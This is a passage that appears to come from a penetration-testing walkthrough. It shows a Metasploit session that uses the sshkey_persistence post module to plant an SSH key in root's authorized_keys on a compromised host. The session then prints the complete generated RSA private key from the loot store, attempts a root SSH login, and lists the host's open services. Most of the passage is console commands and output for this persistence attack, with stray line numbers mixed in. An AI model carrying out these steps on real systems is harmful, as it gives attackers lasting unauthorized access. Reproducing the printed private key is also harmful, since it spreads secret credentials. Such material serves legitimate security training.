CREATESSHFOLDER false yes If no .ssh folder is found, create it for a user
PUBKEY no Public Key File to use. (Default: Create a new one)
SESSION yes The session to run this module on.
SSHD_CONFIG /etc/ssh/sshd_config yes sshd_config file
USERNAME no User to add SSH key to (Default: all users on box)
Description:
This module will add an SSH key to a specified user (or all), to
allow remote login via SSH at any time.
msf5 post(linux/manage/sshkey_persistence) > set SESSION 2
SESSION => 2
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
msf5 post(linux/manage/sshkey_persistence) > exploit
[*] Checking SSH Permissions
[-] Failed to open file: /etc/ssh/sshd_config: core_channel_open: Operation failed: 1
[*] Authorized Keys File: .ssh/authorized_keys
[*] Finding .ssh directories
[+] Storing new private key as /root/.msf4/loot/20230324150923_default_192.198.6.3_id_rsa_867328.txt
[*] Adding key to /root/.ssh/authorized_keys
[+] Key Added
[*] Post module execution completed
msf5 post(linux/manage/sshkey_persistence) > loot
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
192.198.6.3 id_rsa ssh_id_rsa text/plain OpenSSH Private Key File /root/.msf4/loot/20230324150923_default_192.198.6.3_id_rsa_867328.txt
msf5 post(linux/manage/sshkey_persistence) > cat /root/.msf4/loot/20230324150923_default_192.198.6.3_id_rsa_867328.txt
[*] exec: cat /root/.msf4/loot/20230324150923_default_192.198.6.3_id_rsa_867328.txt
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAsrN0jcNKAhSb+X7aky4ZfRW1CK8XzRnSbDq7IEIih1bI3Qwn
UwDOL5IGgw2FT1h/Gi96qTy4L+yvMzuFz/aE7sNWRRJuD0YZnIquR0oQc8d40CKe
ZJPU9OPXJru5X823J1qQy3DAKytbwjw8orKrF6yzbWCx3BCm0eJ2akbS9c8vfD4W
cqvKHXLRpX2dixhXYY4TR74GsBTjnMPVVz0C1UC2XWqPd9FjPsdDw005wbNoK+qD
Acnrgb/7Q8XFrghwQMckRENEB1vBDh0pX7vmmyAChCXj0XgMpFPkBAl6/EnVHCT+
LTe9beMmADSOuRY1U/5W1lGUY9HwWWP9qq2jMwIDAQABAoIBAFjbCIpw33zXWJMf
c3mZg40B3Sl7Pp96RnoQXfl1SQv4qBnZsDgCf4OB3YEOmQnSHCkeEKTUD1WtH5Se
9TNqBcFfGadwuY8YsSV4g53pAvM+7SC5Bf9Gzq4SGGonD87GUFreGn8+Ch+tCIw1
PYU8x/wWoIUzflzJXtmf/Hdtzfnw/K/AppJq1tCIr92SWGvy3VPwPs0F7ex8qZiU
P7hfqJipwp1XrAdUKVDB982EDD4QxIOE/Qkhfh7I6phLem78h74brTJWrAavPjVp
1q12Pc2WjwpCh4uwfF4RrmnUld++YUqMxsW9NYiNOvFLHiGkZrI44rtQ1jQh+Azd
12Gbe4ECgYEA6sMuFxLtqKddcix4rSlxA8Z1yFryhhJRDOMDZtg397+lC0Av7Oos
zFJ5FUnAYEhYjcZzULjFpUvt3H2TLdGJQ6lBPrRQKWRKDzvq1SyZb1xYeNy5HQxO
Q/vB0kIcIYIOthaym3NOkfYvpBdQ7Djs3HH+4LukQtZS4qflYnVmy0ECgYEAwt31
f0BvCSb2fQBBwGMy8HlPX1UdjsDsYeQOkGGw0Al3ydJyUIutbiLKqWBfi+Vtp9Nh
nqoIZ4xofKSCz9a5FQTpviQs97r+/ZYFJB6Lg0IbhSdsovYW59mRQaSd57q50Bn9
TIN4OTWchmw5Oq/XtMKsAC2E00D2fDYaVu3UFXMCgYBHSNTp9LltiMR7Mr3B9t92
QgDpwZP62fz6aMRTqjv0YqD+9ZKX4dOQh0p1CFv94HnjMus5C6IYOyIS3Z6fPwzr
Gq3RGHdu2iES1yLLcCt3ARdsO7mJ9H6fbgbAjYp1MkS9Tc8WHMEy2QpGTT4pPG/P
0F2QZ+nM0b+BS3H/n56DAQKBgQC8gcdJMGW5bs2noqX4nH3cjx2vVUFgpVSGZf2I
wlgvB9mvjTs0m8pL7rAqJaaISItJfHzE5it3MCar3OEGeetVYAlV/NzbUTP20Dds
93dypHLG3pqDEpiZ9KhF3h862jGCFIIqkEuu3CPtDahXE2AR5vhIu7/wNLm88wGL
8knl7QKBgASXcQ0N2AbFBy/kx0ZKGyz92vCfTLjLugVwq8GHs76bXYB5AzA5JgK9
vGJsf50zUChmvT4W7vam/BfK7xQrQwXdUtJCpzO77SF/wTqqg2JcEuS0aipngzKG
SZEwAZzsDtP6y13baIVzM9+PRJdCduEDH/XFEPVcRPRzTDeffAgh
-----END RSA PRIVATE KEY-----
1
2
3
4
5
6
7
8
9
10
11
12
13
msf5 post(linux/manage/sshkey_persistence) > ssh -i /root/.msf4/loot/20230324150923_default_192.198.6.3_id_rsa_867328.txt root@192.198.6.3
[*] exec: ssh -i /root/.msf4/loot/20230324150923_default_192.198.6.3_id_rsa_867328.txt root@192.198.6.3
ssh: connect to host 192.198.6.3 port 22: Connection refused
msf5 post(linux/manage/sshkey_persistence) > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.198.6.3 139 tcp netbios-ssn open Samba smbd 3.X - 4.X workgroup: WORKGROUP
192.198.6.3 445 tcp netbios-ssn open Samba smbd 3.X - 4.X workgroup: WORKGROUP
192.198.6.3 1723 tcp pptp open
